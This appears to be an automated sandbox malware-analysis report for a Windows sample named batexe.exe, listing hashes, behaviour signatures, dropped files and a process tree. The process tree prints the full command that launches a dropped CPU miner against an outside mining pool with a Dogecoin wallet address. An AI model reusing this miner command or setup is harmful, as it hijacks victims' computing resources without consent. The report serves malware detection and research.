73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
294s
max time network
294s
platform
windows10-2004_x64
resource
win10v2004-20231215-ja
resource tags

arch:x64arch:x86image:win10v2004-20231215-jalocale:ja-jpos:windows10-2004-x64systemwindows
submitted
13/02/2024, 19:58

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Control Panel\International\Geo\Nation	batexe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Control Panel\International\Geo\Nation	b2e.exe

Executes dropped EXE 2 IoCs

pid	Process
5116	b2e.exe
5484	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
5484	cpuminer-sse2.exe
5484	cpuminer-sse2.exe
5484	cpuminer-sse2.exe
5484	cpuminer-sse2.exe
5484	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/3920-8-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 3920 wrote to memory of 5116	3920	batexe.exe	84
PID 3920 wrote to memory of 5116	3920	batexe.exe	84
PID 3920 wrote to memory of 5116	3920	batexe.exe	84
PID 5116 wrote to memory of 4016	5116	b2e.exe	85
PID 5116 wrote to memory of 4016	5116	b2e.exe	85
PID 5116 wrote to memory of 4016	5116	b2e.exe	85
PID 4016 wrote to memory of 5484	4016	cmd.exe	88
PID 4016 wrote to memory of 5484	4016	cmd.exe	88

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3920
- C:\Users\Admin\AppData\Local\Temp\5B8D.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\5B8D.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\5B8D.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:5116
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\5ED9.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4016
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:5484

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\5B8D.tmp\b2e.exe

Filesize
3.5MB

MD5
433bd64882acadeea73c4f2129c37954

SHA1
06b95fcf6de6a544432b5b91ae011ef2d614a7e6

SHA256
9b0109a2f7b12e1f1224dc8add0fac9625143c18d17312f513c10f42c6a5876b

SHA512
3e7dc20e11a63a5df90f23cead57d2fdc5753c1dd35150a0cde066f450eef1fb587322f7ad574dc01b349900b1d5e8a9f9e22c53651d4c9a3c1b8d2e9868be05

Download Submit
C:\Users\Admin\AppData\Local\Temp\5B8D.tmp\b2e.exe

Filesize
1.1MB

MD5
5dd6e1c3d4a9cd1a257ae7edef179506

SHA1
45be7f49e7507064bb7adcb07e4141eccd3842da

SHA256
181b7632e324dfad09542eec3ad17700a038eea355bf900d0d3268db8f4bbb5b

SHA512
909d737b3a616d968d7f3a92b1ec47cb79b983503aa51cd6bab7aa26ef7237c965fd91b78189f0fe84edd00a90649c07a2205a23310ef4d1426fe2d191f01508

Download Submit
C:\Users\Admin\AppData\Local\Temp\5B8D.tmp\b2e.exe

Filesize
1.3MB

MD5
f5a543184fdeb78b33db7b3dcc195842

SHA1
c93740e8f2e36244b2331a0e50fe359d725fc632

SHA256
2a3d1e45a82aded0add1819aefab9cbad5d1149f194d075d487db7aca7e5e762

SHA512
5d20b069c6b39811eec7f9ed71b0515da08dba65e8bc56aa4b7992d3433aa2b68d165175c8804b58c69c2536efd3b0eaa2faed23d4e13c86fe2b61f7c41cdc41

Download Submit
C:\Users\Admin\AppData\Local\Temp\5ED9.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
121KB

MD5
b49b725e2a43f6a4390e581a20c92727

SHA1
a81a26745ce237b087db4fed83a8523b2bedd446

SHA256
b5ec7a2ac8f2d1c8538dc77de0d8078f2d97bdf5e95a51e448d3df466dff0c21

SHA512
e8213d19ccb6af7d7661ab90413507bf5deaef9cc2a9b61666270e7496245701a6d8f4981810a2ffa0e86d5cf5bf182cd3ec1cfa767f4cec54c07f6f2ac78699

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
157KB

MD5
462c2545ffa3ba02d65f40b1faa1a023

SHA1
5c0a4b41ecf9724c4ffd753ccbe603fbdbaab6af

SHA256
796ccc0e46a64615599250525ab0ae61b66bfb75d27075f00ac6bda56670ee13

SHA512
7e3a43d521b726469aa07a2f2f42a7d47b30f41994c251eb02ae537ac484633649c72ad4cd7d1f620de53139c53adaaaf64c8d4082bd5e202d6b0fa57487f9cd

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
161KB

MD5
ca45dbd7b7a56aaaf0701255bd691b47

SHA1
9dfa92f20cf27ea3c139b8ffcc0f70fa6d334fcd

SHA256
231ad8531210816f85dca5ba3116d1129e00f97dfdf1ae6c1cfa446e2c684799

SHA512
5e2174ac08e58126be52b531c129a136078d9caed49a5920794a9fdd5f9d59e78f479fc7ae77897dfb2eed96c713d7314b2bd873b306f63190fdcea8bc8eb7c2

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
152KB

MD5
d3cfcc3e10ada0b4a52edb2908f1a9d3

SHA1
5f1942982ef1cfb9fff9af58004d8ebd4bc50321

SHA256
56839aef4caf11910d4c06d0e737daecded8b2089bdecdffef09066afab6ad52

SHA512
59249eb0bedd280ae315d7d55a26072c433190f29e1969483c58ae3ac4dae0f632ddafae79c54b1f697df08a1b209d64e1efc98a3db709553a39f65ce3561572

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
152KB

MD5
2a0feab542bcc46916c2df36d895495e

SHA1
8720413c34e2b9d47567c096cc9a57ec86f058f5

SHA256
4cc01e195002ac2506f60beabe751501b6dc42cddc2b86f1d1f6350eb7af3456

SHA512
5064a48bd2bbda0336a4072ced07f903da7fe0e7a8d87c48c1aa16c63214d6237f9948d67c34ded36c3ef2bf529a64b47737dae98619c3b3732829bd5864893f

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
95KB

MD5
7b12b43a32e736aae547d90d01f973bf

SHA1
faaaebefe554d137f17bae7b4fe9a48066986280

SHA256
b4119ec5e84cf2352dcbd15e6924df610c2ee46d3de53e2e6ed29193839d618a

SHA512
abec2cbefa8481e26175e3acf17a820f2695460c620982d3350c72ece5eb53dd7a531b23b28d4942b620a024b9bc6515362363290681b95258e84006e4e2eae2

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
126KB

MD5
cea9866363a0a8d00b1f42701844cdea

SHA1
6484d642482d3203033fb0d983a03de3245eb513

SHA256
2fca9af355bb7e4272be985e5d2c2b337ce8d4263c1a638a1a17bed438ab435c

SHA512
b0d609240409ae03213ee0faadb30aefd7c119ceb322315d3d995d2076e9587a96bea27e1d1428d88e8ecd415c915fcea7290d56b6ca9aa6e1e00e1a37ad324b

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
140KB

MD5
bc505d6341aa72f53c01c23c86ec2326

SHA1
10a7749deda5ec1f1402468d84d050caf958956c

SHA256
44b3ffc9e6a6e4885bff7f557df1ceb923b23c04caae5f7982155a3fb7534627

SHA512
30eee3da87ebd4ff74fea0f469eddfc288d58d19bcccee6298f5f548cb0a79453e2f70443271dafe07161fa1faeb6dcd9707d0892e929a54cf7d2fa8116c25a6

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
118KB

MD5
f0715ae018359ef1e9151589c333c37b

SHA1
d00526d90e5779e86af432ae090c10b4d50eaafb

SHA256
a7c4f8f36d1e01e1ebe4ca9412cf81384c03ae38e5744078d327cc8d50676f5c

SHA512
7d86853f7efb47dff11ce19148d1ddcfdc9c9b16d7b7b901e92484ececf2e6bbbe71750b50705cf0d6873ce4ec7c48f63060fd623566d714082258eca6dad2c2

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
96KB

MD5
c5cb4ecf39eb3c3d110f2ed4af49e948

SHA1
afc0a1f2b54d9a5c9f2edfc703eb702097e8a6e4

SHA256
f1f49ad99bd8613854e20105171f794914bd908c5d9839d728f5f05df2b2c8fe

SHA512
ea5a744efe4e35822f04040a58f775323e5e90abf0e91b378726ead8b18bb6a68b9302b10d53105b6e47d8eee6e651fa87db32acf4e2ed7f90f9fa78c53de3c0

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
148KB

MD5
f72fc27eaca5f2bcec0e2260f9c9662c

SHA1
4ea15ea33484e1d53d49fd459ce254887cccd0f7

SHA256
3260b014f4bab210944261eb30334022cfd03d9e64c3e0bc7db1ac26e44f7450

SHA512
9758cd0aaba52852c1903a0326cc9a107baa9243f4c0cd1ad7cf0c084699ae96ff880b3bba6bfb49bef67ac73b006593598f813dd94c1cd1f8b397321c3c34c3

Download Submit
memory/3920-8-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/5116-53-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/5116-9-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/5484-54-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5484-64-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5484-45-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/5484-47-0x0000000000F40000-0x00000000027F5000-memory.dmp

Filesize
24.7MB

Download
memory/5484-44-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/5484-43-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5484-59-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5484-46-0x0000000071D00000-0x0000000071D98000-memory.dmp

Filesize
608KB

Download
memory/5484-69-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5484-74-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5484-79-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5484-84-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5484-89-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5484-99-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download